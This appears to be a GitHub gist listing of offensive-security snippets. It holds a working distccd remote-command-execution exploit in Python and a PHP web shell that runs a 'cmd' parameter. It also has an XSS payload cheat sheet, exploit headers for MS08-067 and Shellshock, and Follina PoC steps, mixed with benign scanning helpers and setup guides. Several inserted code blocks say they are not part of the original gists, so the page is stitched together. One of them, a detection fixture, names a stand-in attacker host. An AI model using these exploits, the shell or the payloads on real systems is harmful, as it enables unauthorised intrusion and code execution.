Juan Pablo Perata cxzero

@cxzero
cxzero / ms08-067-fixed.py
Last active April 9, 2021 04:40 — forked from thel3l/ms08-067-fixed.py
Updated MS08-067 exploit without custom netcat listener.
#!/usr/bin/python
###############################################################################################
# MS08-067 Exploit - Auto Reverse NetCat Payload Mod by 3mrgnc3 #
# Designed for Kali Linux - msfvenom and nc required to function #
# Based on Ported Exploit By EKOZ https://github.com/jivoi https://jivoi.github.io/ #
# Modified version of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/). #
# The ret addr & ROP parts are ported from MSF Module exploit/windows/smb/ms08_067_netapi #
###############################################################################################
import struct
@cxzero
cxzero / massports.sh
Last active April 28, 2021 23:04
Simple script to help in running masscan against all TCP and UDP ports of a given IP, grep the results and display them in a format that can then be used by other tools, for example nmap. The tun0 interface is used; adjust as necessary.
#!/bin/bash
# Simple script to help in running masscan against all TCP and UDP ports,
# grep the results and display them in a format that can then be used by other tools, for example nmap
# massports.sh by cxzero
if [ $# -eq 0 ]; then
echo "usage: massports.sh <IP>"
exit 1
fi
@cxzero
cxzero / exploit.py
Created May 1, 2021 05:02 — forked from claudijd/exploit.py
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@cxzero
cxzero / readme.md
Last active June 1, 2021 18:37
Install Ubuntu 20.04 LTS alongside dual boot with Windows 10

Recently I found it a little harder to set up a dual-boot installation of Ubuntu 20.04 LTS and Windows 10 on a laptop. It involved:

  1. Switch the SSD operation mode from RST to AHCI
  2. Prepare a USB stick with the Ubuntu ISO image to load in UEFI mode (the BIOS does not support legacy mode)
  3. Shrink the Windows 10 partition
  4. Install Ubuntu 20.04, creating an encrypted LVM partition
  5. Enjoy the setup

1 - Switch SSD operation mode from RST to AHCI

@cxzero
cxzero / command.xml
Created July 16, 2021 13:38 — forked from georgestephanis/command.xml
How to upload a file to a WordPress site via the XML-RPC API. Pretty easy, no? The attachment page, if you want an HTML wrapper to present the file, can be found at the following URL: http://yoursite.com/?attachment_id=722 (I left the ID from the successful response in as an example)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
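The same wp.uploadFile call built with Python's standard-library xmlrpc.client, as an added example that is not part of georgestephanis's gist. The struct members name, type, bits and overwrite are the ones the WordPress wp.uploadFile method takes (bits is the base64-encoded file, which xmlrpc.client.Binary produces). The success and fault responses embedded below are constructed for the example (the attachment ID 722 is borrowed from the description above), and yoursite.com is the placeholder hostname the gist uses.

```python
import xmlrpc.client

# Hypothetical endpoint; yoursite.com is the placeholder from the gist.
XMLRPC_URL = "https://yoursite.com/xmlrpc.php"


def build_upload_call(blog_id, username, password, filename, data, mime_type, overwrite=False):
    """Return the XML body of a wp.uploadFile request.

    wp.uploadFile takes blog_id, username, password and a struct with the
    members name, type, bits and overwrite. xmlrpc.client.Binary serialises
    the file bytes as <base64>, which is what the XML in the gist shows.
    """
    params = (
        str(blog_id),
        username,
        password,
        {
            "name": filename,
            "type": mime_type,
            "bits": xmlrpc.client.Binary(data),
            "overwrite": overwrite,
        },
    )
    return xmlrpc.client.dumps(params, methodname="wp.uploadFile")


def parse_upload_response(xml_text):
    """Decode a wp.uploadFile response.

    On success WordPress answers with a struct (id, file, url, type); on
    failure with an XML-RPC fault, which xmlrpc.client.loads raises as Fault.
    """
    try:
        (result,), _method = xmlrpc.client.loads(xml_text)
    except xmlrpc.client.Fault as fault:
        return {"ok": False, "faultCode": fault.faultCode, "faultString": fault.faultString}
    return {"ok": True, **result}


def upload_file(url, username, password, filename, data, mime_type):
    """Live call through ServerProxy (network; not exercised offline).
    Use an https URL: the username and password travel in the request body."""
    proxy = xmlrpc.client.ServerProxy(url)
    return proxy.wp.uploadFile(
        1, username, password,
        {"name": filename, "type": mime_type,
         "bits": xmlrpc.client.Binary(data), "overwrite": False},
    )


# Constructed success response modelled on the struct wp.uploadFile returns.
SAMPLE_RESPONSE = """<?xml version="1.0"?>
<methodResponse><params><param><value><struct>
<member><name>id</name><value><string>722</string></value></member>
<member><name>file</name><value><string>notes.txt</string></value></member>
<member><name>url</name><value><string>http://yoursite.com/wp-content/uploads/notes.txt</string></value></member>
<member><name>type</name><value><string>text/plain</string></value></member>
</struct></value></param></params></methodResponse>"""

# Constructed fault response for bad credentials.
SAMPLE_FAULT = """<?xml version="1.0"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value></fault></methodResponse>"""


if __name__ == "__main__":
    print(build_upload_call(1, "username", "password", "notes.txt", b"hello", "text/plain"))
    print(parse_upload_response(SAMPLE_RESPONSE))
    print(parse_upload_response(SAMPLE_FAULT))
```

The request carries the account password in clear inside the XML, so only ever point this at an https endpoint; xmlrpc.php is also a common credential brute-forcing target, which is why many sites disable it outright.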
@cxzero
cxzero / distccd_rce_CVE-2004-2687.py
Created August 14, 2021 17:50 — forked from DarkCoderSc/distccd_rce_CVE-2004-2687.py
(CVE-2004-2687) DistCC Daemon - Command Execution (Python)
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
distccd v1 RCE (CVE-2004-2687)
This exploit is ported from public Metasploit exploit code:
https://www.exploit-db.com/exploits/9915
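The wire exchange this exploit drives, as an added Python example that is not part of DarkCoderSc's gist: it frames a distcc v1 request the way the public exploit-db 9915 / Metasploit code does (an argv of sh -c <cmd> followed by '#' and dummy compiler arguments, then a one-byte DOTI source) and decodes the daemon's DONE/STAT/SERR/SOUT/DOTO token stream. The token format (4-character name plus 8 hex digits) is the distcc v1 protocol; the response bytes below are constructed, and nothing is sent unless run_command is called against a real distccd.

```python
import socket

DISTCC_PORT = 3632  # distccd's default TCP port


def token(name, value):
    """Encode one distcc v1 token: a 4-character name followed by an
    8-digit hexadecimal number (a body length or an integer value)."""
    return f"{name}{value:08x}".encode()


def build_request(cmd):
    """Frame a compile request whose argv is really `sh -c <cmd>`.

    The '#' after the command turns the dummy compiler arguments into a
    shell comment, so the job still looks like a compile to the daemon while
    sh runs only <cmd>. This is the argument layout the public exploit uses.
    """
    argv = ["sh", "-c", cmd, "#", "-c", "main.c", "-o", "main.o"]
    req = token("DIST", 1) + token("ARGC", len(argv))
    for arg in argv:
        raw = arg.encode()
        req += token("ARGV", len(raw)) + raw
    source = b"A"  # the 'preprocessed source'; its content never matters here
    return req + token("DOTI", len(source)) + source


BODY_TOKENS = {"SERR", "SOUT", "DOTO"}


def parse_response(data):
    """Decode the server's token stream into a dict.

    SERR, SOUT and DOTO carry a length-prefixed body (stderr, stdout and the
    object file); DONE and STAT carry a plain integer (protocol version and
    exit status of the command).
    """
    out, pos = {}, 0
    while pos + 12 <= len(data):
        name = data[pos:pos + 4].decode("ascii")
        value = int(data[pos + 4:pos + 12], 16)
        pos += 12
        if name in BODY_TOKENS:
            out[name] = data[pos:pos + value]
            pos += value
        else:
            out[name] = value
    return out


def run_command(host, cmd, port=DISTCC_PORT, timeout=10):
    """Send the request and return the parsed response (network call; only
    use against hosts you are authorised to test)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(cmd))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


# Constructed response for `id` on a daemon running as root; real output varies.
SAMPLE_RESPONSE = (b"DONE00000001STAT00000000SERR00000000"
                   b"SOUT0000000cuid=0(root)\n"
                   b"DOTO00000000")


if __name__ == "__main__":
    print(build_request("id"))
    print(parse_response(SAMPLE_RESPONSE))
```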
@cxzero
cxzero / nmapPorts.sh
Last active June 13, 2022 16:00
Utility to extract ports from nmap grepable output
#!/bin/bash
# To be used with nmap grepable output (-oG option).
# Prints every port number found in the file as one comma-separated list,
# ready for nmap -p. Note that every port/state pair nmap reported is included
# (closed and filtered ones too, if nmap listed them); run the original scan
# with --open if you only want open ports.
if [ -z "$1" ]; then
    echo "Usage: $(basename "$0") <grepable-nmap-input-file>"
    exit 1
fi
# Each entry in the Ports: field looks like 22/open/tcp//ssh///, so grab the
# number that follows whitespace and precedes the first slash.
ports=$(grep -oP '\s\K[0-9]+(?=/)' "$1")
echo "$ports" | xargs | sed 's/ /,/g'
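A Python version of the two extraction helpers above (massports.sh and nmapPorts.sh), added here as an example rather than taken from the gists: it parses masscan's list output (-oL, one "open <proto> <port> <ip> <timestamp>" line per result) and nmap's grepable output (-oG, a Ports: field of port/state/proto/... entries), de-duplicates, and emits the T:...,U:... form that nmap -p accepts. The scan output embedded below is constructed for the example, and by default only ports in state open are kept from nmap output, whereas the bash one-liner above keeps every port nmap listed.

```python
import re
from collections import defaultdict

# Constructed sample of masscan list output (-oL). Field order is
# "<state> <proto> <port> <ip> <timestamp>"; lines starting with '#' are comments.
MASSCAN_LIST = """\
#masscan
open tcp 22 10.10.10.5 1619650000
open tcp 80 10.10.10.5 1619650001
open udp 161 10.10.10.5 1619650002
open tcp 22 10.10.10.5 1619650003
# end
"""

# Constructed sample of nmap grepable output (-oG). Each Ports: entry is
# port/state/proto/owner/service/rpcinfo/version/.
NMAP_GREPABLE = """\
# Nmap 7.91 scan initiated
Host: 10.10.10.5 ()\tStatus: Up
Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2/, 80/open/tcp//http//nginx/, 443/closed/tcp//https///, 161/open|filtered/udp//snmp///\tIgnored State: filtered (996)
# Nmap done
"""


def parse_masscan_list(text):
    """Return {proto: sorted unique ports} from masscan -oL output."""
    ports = defaultdict(set)
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4 or fields[0] != "open":
            continue
        _state, proto, port, _ip = fields[:4]
        ports[proto].add(int(port))
    return {proto: sorted(v) for proto, v in ports.items()}


# port/state/proto at the start of each Ports: entry; state may be "open|filtered".
PORT_ENTRY = re.compile(r"(\d+)/([^/]*)/(tcp|udp)/")


def parse_nmap_grepable(text, states=("open",)):
    """Return {proto: sorted unique ports} whose state is in `states`."""
    ports = defaultdict(set)
    for line in text.splitlines():
        if "Ports:" not in line:
            continue
        for port, state, proto in PORT_ENTRY.findall(line):
            if state in states:
                ports[proto].add(int(port))
    return {proto: sorted(v) for proto, v in ports.items()}


def nmap_port_spec(ports):
    """Format {proto: ports} as the T:.../U:... list nmap -p understands."""
    parts = []
    if ports.get("tcp"):
        parts.append("T:" + ",".join(str(p) for p in ports["tcp"]))
    if ports.get("udp"):
        parts.append("U:" + ",".join(str(p) for p in ports["udp"]))
    return ",".join(parts)


if __name__ == "__main__":
    print(nmap_port_spec(parse_masscan_list(MASSCAN_LIST)))
    print(nmap_port_spec(parse_nmap_grepable(NMAP_GREPABLE)))
```

Pass states=("open", "open|filtered") when feeding UDP results back into a deeper scan, since nmap reports most UDP ports as open|filtered rather than open.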
@cxzero
cxzero / xss_vectors.txt
Created May 13, 2022 16:17 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@cxzero
cxzero / ms-msdt.MD
Created June 10, 2022 01:30 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain references to external OLE objects that are HTML files. There is a URL scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in its parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
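A check for the docx side of this vector, added here as an example and not part of tothi's write-up: the external OLE reference lives in word/_rels/document.xml.rels as an oleObject relationship with TargetMode="External", and the HTML it points to is what carries the ms-msdt: URL. The code builds a minimal constructed docx in memory to scan (the attacker hostname, relationship IDs and the HTML snippet are placeholders, and the real msdt parameters are deliberately left out), flags external oleObject targets, and separately checks fetched HTML for the scheme.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"


def external_ole_targets(docx_bytes):
    """Return [(rels part, Target)] for every oleObject relationship that
    points outside the package (TargetMode="External").

    A benign embedded object has an internal Target such as
    embeddings/oleObject1.bin and no TargetMode attribute.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Target")))
    return found


# The second half of the chain: the fetched HTML navigates to an ms-msdt: URL.
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)


def html_invokes_msdt(html_text):
    """True if the HTML contains the ms-msdt: scheme anywhere."""
    return MSDT_SCHEME.search(html_text) is not None


def build_sample_docx(target, external=True):
    """Constructed minimal docx: a placeholder document part plus a rels part
    with one oleObject relationship pointing at `target`."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{STYLES_REL_TYPE}" Target="styles.xml"/>'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="{target}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<document/>")  # placeholder body
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed HTML stand-in for what the external target serves; the real
# msdt parameters are intentionally omitted.
SAMPLE_HTML = '<html><script>window.location.href = "ms-msdt:/id PLACEHOLDER";</script></html>'


if __name__ == "__main__":
    suspicious = build_sample_docx("http://attacker.invalid/index.html!")
    print(external_ole_targets(suspicious))
    print(html_invokes_msdt(SAMPLE_HTML))
```

Treat any external oleObject target as worth a look on its own: a document has no ordinary reason to load an OLE object over HTTP, so this check does not depend on fetching the HTML at all, which the attacker can serve conditionally.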

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.